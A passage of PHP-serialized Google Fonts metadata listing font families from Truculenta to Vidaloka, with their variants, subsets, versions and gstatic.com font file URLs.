v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMtAlswcFHnJMMhg.ttf\";s:3:\"900\";s:129:\"http://fonts.gstatic.com/s/truculenta/v18/LhWfMVvBKusVIfNYGi1-WvRVyDdZeeiySNppcu32Mb2f06y6Oa21F6XHi0VYDX_PzOupMvklswcFHnJMMhg.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1369;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Trykker\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/trykker/v21/KtktALyWZJXudUPzhNnoOd2j22U.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1370;O:8:\"stdClass\":8:{s:6:\"family\";s:10:\"Tulpen One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:76:\"http://fonts.gstatic.com/s/tulpenone/v21/dFa6ZfeC474skLgesc0CWj0w_HyIRlE.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1371;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Turret Road\";s:8:\"variants\";a:6:{i:0;s:3:\"200\";i:1;s:3:\"300\";i:2;s:7:\"regular\";i:3;s:3:\"500\";i:4;s:3:\"700\";i:5;s:3:\"800\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":6:{s:3:\"200\";s:81:\"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0ONEdeLYk1Mq3ap.ttf\";s:3:\"300\";s:81:\"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0PpEteLYk1Mq3ap.ttf\";s:7:\"regular\";s:77:\"http://fonts.gstatic.com/s/turretroad/v7/pxiAypMgpcBFjE84Zv-fE3tFOvODSVFF.ttf\";s:3:\"500\";s:81:\"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0OxE9eLYk1Mq3ap.ttf\";s:3:\"700\";s:81:\"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0P5FdeLYk1Mq3ap.ttf\";s:3:\"800\";s:81:\"http://fonts.gstatic.com/s/turretroad/v7/pxidypMgpcBFjE84Zv-fE0PlFteLYk1Mq3ap.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1372;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Twinkle Star\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v3\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:80:\"http://fonts.gstatic.com/s/twinklestar/v3/pe0pMI6IL4dPoFl9LGEmY6WaA_Rue1UwVg.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1373;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Ubuntu\";s:8:\"variants\";a:8:{i:0;s:3:\"300\";i:1;s:9:\"300italic\";i:2;s:7:\"regular\";i:3;s:6:\"italic\";i:4;s:3:\"500\";i:5;s:9:\"500italic\";i:6;s:3:\"700\";i:7;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":8:{s:3:\"300\";s:72:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoC1CzTt2aMH4V_gg.ttf\";s:9:\"300italic\";s:74:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZftWyIPYBvgpUI.ttf\";s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCs6KVjbNBYlgo6eAT3v02QFg.ttf\";s:6:\"italic\";s:70:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCu6KVjbNBYlgoKeg7znUiAFpxm.ttf\";s:3:\"500\";s:72:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCjC3Tt2aMH4V_gg.ttf\";s:9:\"500italic\";s:74:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejYHtGyIPYBvgpUI.ttf\";s:3:\"700\";s:72:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCv6KVjbNBYlgoCxCvTt2aMH4V_gg.ttf\";s:9:\"700italic\";s:74:\"http://fonts.gstatic.com/s/ubuntu/v20/4iCp6KVjbNBYlgoKejZPsmyIPYBvgpUI.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1374;O:8:\"stdClass\":8:{s:6:\"family\";s:16:\"Ubuntu Condensed\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/ubuntucondensed/v16/u-4k0rCzjgs5J7oXnJcM_0kACGMtf-fVqvHoJXw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1375;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Ubuntu Mono\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:6:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"greek\";i:3;s:9:\"greek-ext\";i:4;s:5:\"latin\";i:5;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/ubuntumono/v15/KFOjCneDtsqEr0keqCMhbBc9AMX6lJBP.ttf\";s:6:\"italic\";s:81:\"http://fonts.gstatic.com/s/ubuntumono/v15/KFOhCneDtsqEr0keqCMhbCc_CsHYkYBPY3o.ttf\";s:3:\"700\";s:82:\"http://fonts.gstatic.com/s/ubuntumono/v15/KFO-CneDtsqEr0keqCMhbC-BL-Hyv4xGemO1.ttf\";s:9:\"700italic\";s:85:\"http://fonts.gstatic.com/s/ubuntumono/v15/KFO8CneDtsqEr0keqCMhbCc_Mn33tYhkf3O1GVg.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1376;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Uchen\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:7:\"tibetan\";}s:7:\"version\";s:2:\"v7\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:64:\"http://fonts.gstatic.com/s/uchen/v7/nKKZ-GokGZ1baIaSEQGodLxA.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1377;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Ultra\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-20\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/ultra/v19/zOLy4prXmrtY-tT6yLOD6NxF.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1378;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"Uncial Antiqua\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v20\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:85:\"http://fonts.gstatic.com/s/uncialantiqua/v20/N0bM2S5WOex4OUbESzoESK-i-PfRS5VBBSSF.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1379;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Underdog\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:8:\"cyrillic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"http://fonts.gstatic.com/s/underdog/v22/CHygV-jCElj7diMroVSiU14GN2Il.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1380;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Unica One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v13\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:74:\"http://fonts.gstatic.com/s/unicaone/v13/DPEuYwWHyAYGVTSmalshdtffuEY7FA.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1381;O:8:\"stdClass\":8:{s:6:\"family\";s:14:\"UnifrakturCook\";s:8:\"variants\";a:1:{i:0;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/unifrakturcook/v19/IurA6Yli8YOdcoky-0PTTdkm56n05Uw13ILXs-h6.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1382;O:8:\"stdClass\":8:{s:6:\"family\";s:18:\"UnifrakturMaguntia\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:96:\"http://fonts.gstatic.com/s/unifrakturmaguntia/v16/WWXPlieVYwiGNomYU-ciRLRvEmK7oaVun2xNNgNa1A.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1383;O:8:\"stdClass\":8:{s:6:\"family\";s:7:\"Unkempt\";s:8:\"variants\";a:2:{i:0;s:7:\"regular\";i:1;s:3:\"700\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-05-11\";s:5:\"files\";O:8:\"stdClass\":2:{s:7:\"regular\";s:70:\"http://fonts.gstatic.com/s/unkempt/v19/2EbnL-Z2DFZue0DSSYYf8z2Yt_c.ttf\";s:3:\"700\";s:74:\"http://fonts.gstatic.com/s/unkempt/v19/2EbiL-Z2DFZue0DScTow1zWzq_5uT84.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1384;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Unlock\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v22\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/unlock/v22/7Au-p_8ykD-cDl7GKAjSwkUVOQ.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1385;O:8:\"stdClass\":8:{s:6:\"family\";s:4:\"Unna\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:6:\"italic\";i:2;s:3:\"700\";i:3;s:9:\"700italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v21\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:63:\"http://fonts.gstatic.com/s/unna/v21/AYCEpXzofN0NCpgBlGHCWFM.ttf\";s:6:\"italic\";s:66:\"http://fonts.gstatic.com/s/unna/v21/AYCKpXzofN0NOpoLkEPHSFNyxw.ttf\";s:3:\"700\";s:67:\"http://fonts.gstatic.com/s/unna/v21/AYCLpXzofN0NMiQusGnpRFpr3vc.ttf\";s:9:\"700italic\";s:70:\"http://fonts.gstatic.com/s/unna/v21/AYCJpXzofN0NOpozLGzjQHhuzvef5Q.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1386;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Updock\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:2:\"v2\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:67:\"http://fonts.gstatic.com/s/updock/v2/nuF4D_3dVZ70UI9SjLK3602XBw.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1387;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Urbanist\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v10\";s:12:\"lastModified\";s:10:\"2022-08-31\";s:5:\"files\";O:8:\"stdClass\":18:{s:3:\"100\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDyx8fFpOrS8SlKw.ttf\";s:3:\"200\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDSx4fFpOrS8SlKw.ttf\";s:3:\"300\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDlR4fFpOrS8SlKw.ttf\";s:7:\"regular\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDyx4fFpOrS8SlKw.ttf\";s:3:\"500\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqD-R4fFpOrS8SlKw.ttf\";s:3:\"600\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDFRkfFpOrS8SlKw.ttf\";s:3:\"700\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDLBkfFpOrS8SlKw.ttf\";s:3:\"800\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDSxkfFpOrS8SlKw.ttf\";s:3:\"900\";s:90:\"http://fonts.gstatic.com/s/urbanist/v10/L0xjDF02iFML4hGCyOCpRdycFsGxSrqDYhkfFpOrS8SlKw.ttf\";s:9:\"100italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA133VJmvacG1K4S1.ttf\";s:9:\"200italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA113VZmvacG1K4S1.ttf\";s:9:\"300italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA12pVZmvacG1K4S1.ttf\";s:6:\"italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA133VZmvacG1K4S1.ttf\";s:9:\"500italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA13FVZmvacG1K4S1.ttf\";s:9:\"600italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA10pUpmvacG1K4S1.ttf\";s:9:\"700italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA10QUpmvacG1K4S1.ttf\";s:9:\"800italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA113UpmvacG1K4S1.ttf\";s:9:\"900italic\";s:92:\"http://fonts.gstatic.com/s/urbanist/v10/L0xtDF02iFML4hGCyMqgdyNEf6or5L2WA11eUpmvacG1K4S1.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1388;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"VT323\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/vt323/v17/pxiKyp0ihIEF2hsYHpT2dkNE.ttf\";}s:8:\"category\";s:9:\"monospace\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1389;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Vampiro One\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/vampiroone/v18/gokqH6DoDl5yXvJytFsdLkqnsvhIor3K.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1390;O:8:\"stdClass\":8:{s:6:\"family\";s:6:\"Varela\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v16\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:68:\"http://fonts.gstatic.com/s/varela/v16/DPEtYwqExx0AWHXJBBQFfvzDsQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1391;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Varela Round\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:4:{i:0;s:6:\"hebrew\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";i:3;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/varelaround/v19/w8gdH283Tvk__Lua32TysjIvoMGOD9gxZw.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1392;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Varta\";s:8:\"variants\";a:5:{i:0;s:3:\"300\";i:1;s:7:\"regular\";i:2;s:3:\"500\";i:3;s:3:\"600\";i:4;s:3:\"700\";}s:7:\"subsets\";a:3:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";i:2;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v17\";s:12:\"lastModified\";s:10:\"2022-08-24\";s:5:\"files\";O:8:\"stdClass\":5:{s:3:\"300\";s:83:\"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x96j4EirE-9PGLfQ.ttf\";s:7:\"regular\";s:83:\"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9tD4EirE-9PGLfQ.ttf\";s:3:\"500\";s:83:\"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9hj4EirE-9PGLfQ.ttf\";s:3:\"600\";s:83:\"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9ajkEirE-9PGLfQ.ttf\";s:3:\"700\";s:83:\"http://fonts.gstatic.com/s/varta/v17/Qw3AZQpJHj_6LzHUngWbrFkDH1x9UzkEirE-9PGLfQ.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1393;O:8:\"stdClass\":8:{s:6:\"family\";s:11:\"Vast Shadow\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:78:\"http://fonts.gstatic.com/s/vastshadow/v15/pe0qMImKOZ1V62ZwbVY9dfe6Kdpickwp.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1394;O:8:\"stdClass\":8:{s:6:\"family\";s:9:\"Vazirmatn\";s:8:\"variants\";a:9:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:2:\"v6\";s:12:\"lastModified\";s:10:\"2022-08-09\";s:5:\"files\";O:8:\"stdClass\":9:{s:3:\"100\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklWgyOReZ72DF_QY.ttf\";s:3:\"200\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklegzOReZ72DF_QY.ttf\";s:3:\"300\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklTYzOReZ72DF_QY.ttf\";s:7:\"regular\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklWgzOReZ72DF_QY.ttf\";s:3:\"500\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklVozOReZ72DF_QY.ttf\";s:3:\"600\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklbY0OReZ72DF_QY.ttf\";s:3:\"700\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklY80OReZ72DF_QY.ttf\";s:3:\"800\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRkleg0OReZ72DF_QY.ttf\";s:3:\"900\";s:91:\"http://fonts.gstatic.com/s/vazirmatn/v6/Dxx78j6PP2D_kU2muijPEe1n2vVbfJRklcE0OReZ72DF_QY.ttf\";}s:8:\"category\";s:10:\"sans-serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1395;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Vesper Libre\";s:8:\"variants\";a:4:{i:0;s:7:\"regular\";i:1;s:3:\"500\";i:2;s:3:\"700\";i:3;s:3:\"900\";}s:7:\"subsets\";a:3:{i:0;s:10:\"devanagari\";i:1;s:5:\"latin\";i:2;s:9:\"latin-ext\";}s:7:\"version\";s:3:\"v19\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":4:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/vesperlibre/v19/bx6CNxyWnf-uxPdXDHUD_Rd4D0-N2qIWVQ.ttf\";s:3:\"500\";s:85:\"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdA-2ap0okKXKvPlw.ttf\";s:3:\"700\";s:85:\"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdAs2Cp0okKXKvPlw.ttf\";s:3:\"900\";s:85:\"http://fonts.gstatic.com/s/vesperlibre/v19/bx6dNxyWnf-uxPdXDHUD_RdAi2Kp0okKXKvPlw.ttf\";}s:8:\"category\";s:5:\"serif\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1396;O:8:\"stdClass\":8:{s:6:\"family\";s:12:\"Viaoda Libre\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:5:{i:0;s:8:\"cyrillic\";i:1;s:12:\"cyrillic-ext\";i:2;s:5:\"latin\";i:3;s:9:\"latin-ext\";i:4;s:10:\"vietnamese\";}s:7:\"version\";s:3:\"v15\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:81:\"http://fonts.gstatic.com/s/viaodalibre/v15/vEFW2_lWCgoR6OKuRz9kcRVJb2IY2tOHXg.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1397;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Vibes\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:2:{i:0;s:6:\"arabic\";i:1;s:5:\"latin\";}s:7:\"version\";s:3:\"v14\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/vibes/v14/QdVYSTsmIB6tmbd3HpbsuBlh.ttf\";}s:8:\"category\";s:7:\"display\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1398;O:8:\"stdClass\":8:{s:6:\"family\";s:5:\"Vibur\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v23\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:65:\"http://fonts.gstatic.com/s/vibur/v23/DPEiYwmEzw0QRjTpLjoJd-Xa.ttf\";}s:8:\"category\";s:11:\"handwriting\";s:4:\"kind\";s:16:\"webfonts#webfont\";}i:1399;O:8:\"stdClass\":8:{s:6:\"family\";s:8:\"Vidaloka\";s:8:\"variants\";a:1:{i:0;s:7:\"regular\";}s:7:\"subsets\";a:1:{i:0;s:5:\"latin\";}s:7:\"version\";s:3:\"v18\";s:12:\"lastModified\";s:10:\"2022-04-27\";s:5:\"files\";O:8:\"stdClass\":1:{s:7:\"regular\";s:72:\"